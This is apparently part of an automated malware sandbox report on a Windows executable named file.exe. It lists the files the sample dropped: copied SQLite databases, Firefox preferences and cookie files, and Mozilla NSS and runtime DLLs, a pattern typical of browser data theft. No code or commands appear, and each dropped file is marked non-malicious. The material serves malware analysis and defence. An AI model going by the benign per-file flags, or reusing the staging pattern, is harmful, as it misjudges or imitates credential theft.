File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:	9E68EA772705B5EC0C83C2A97BB26324
SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:	312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\AEHIJDAF

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.121297215059106
Encrypted:	false
SSDEEP:	384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5:	D87270D0039ED3A5A72E7082EA71E305
SHA1:	0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256:	F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512:	18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\AFHDAKJKFCFBGCBGDHCB

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with very long lines (1743), with CRLF line terminators
Category:	dropped
Size (bytes):	9504
Entropy (8bit):	5.512408163813622
Encrypted:	false
SSDEEP:	192:nnPOeRnWYbBp6RJ0aX+H6SEXKxkHWNBw8D4Sl:PeegJUaJHEw90
MD5:	1191AEB8EAFD5B2D5C29DF9B62C45278
SHA1:	584A8B78810AEE6008839EF3F1AC21FD5435B990
SHA-256:	0BF10710C381F5FCF42F9006D252E6CAFD2F18840865804EA93DAA06658F409A
SHA-512:	86FF4292BF8B6433703E4E650B6A4BF12BC203EF4BBBB2BC0EEEA8A3E6CC1967ABF486EEDCE80704D1023C15487CC34B6B319421D73E033D950DBB1724ABADD5
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "9e34c6e7-cbed-40a0-ba63-35488e171013");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696426836);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696426837);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

C:\ProgramData\BFCGDAAKFHIDBFIDBKFHJDHCAF

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.8439810553697228
Encrypted:	false
SSDEEP:	24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
MD5:	9D46F142BBCF25D0D495FF1F3A7609D3
SHA1:	629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
SHA-256:	C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
SHA-512:	AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\CFHIIEHJKKECGCBFIIJDAKFHJK

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6732424250451717
Encrypted:	false
SSDEEP:	24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:	CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:	3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:	0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\DBKKFCBAKKFBGCBFHJDGDGDHCA

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.03859996294213402
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWHxDSjENbx56p3DisuwAyHI:58r54w0VW3xWdkEFxcp3y/y
MD5:	D2A38A463B7925FE3ABE31ECCCE66ACA
SHA1:	A1824888F9E086439B287DEA497F660F3AA4B397
SHA-256:	474361353F00E89A9ECB246EC4662682392EBAF4F2A4BE9ABB68BBEBE33FA4A0
SHA-512:	62DB46A530D952568EFBFF7796106E860D07754530B724E0392862EF76FDF99043DA9538EC0044323C814DF59802C3BB55454D591362CB9B6E39947D11E981F7
Malicious:	false
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\EBGDHJECFCFCAKFHCFID

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\HJECAAKK

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136413900497188
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
MD5:	429F49156428FD53EB06FC82088FD324
SHA1:	560E48154B4611838CD4E9DF4C14D0F9840F06AF
SHA-256:	9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
SHA-512:	1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\IJDGCAEBFIIECAKFHIJEGIJEGC

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\freebl3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\mozglue.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\msvcp140.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\ProgramData\nss3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\softokn3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\vcruntime140.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-shm

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.945469354666848
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	1'806'848 bytes
MD5:	78bdea9e949a906de71a9e7e392949e8
SHA1:	1817e5f65fddb23cd1c2f3e6ad45844045b3e72c
